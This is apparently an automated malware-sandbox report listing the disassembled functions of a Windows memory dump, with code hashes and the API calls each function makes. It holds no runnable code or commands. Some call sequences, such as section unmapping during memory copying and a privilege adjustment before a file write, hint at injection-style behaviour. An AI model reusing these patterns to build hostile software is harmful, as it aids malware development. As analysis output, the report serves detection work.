  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
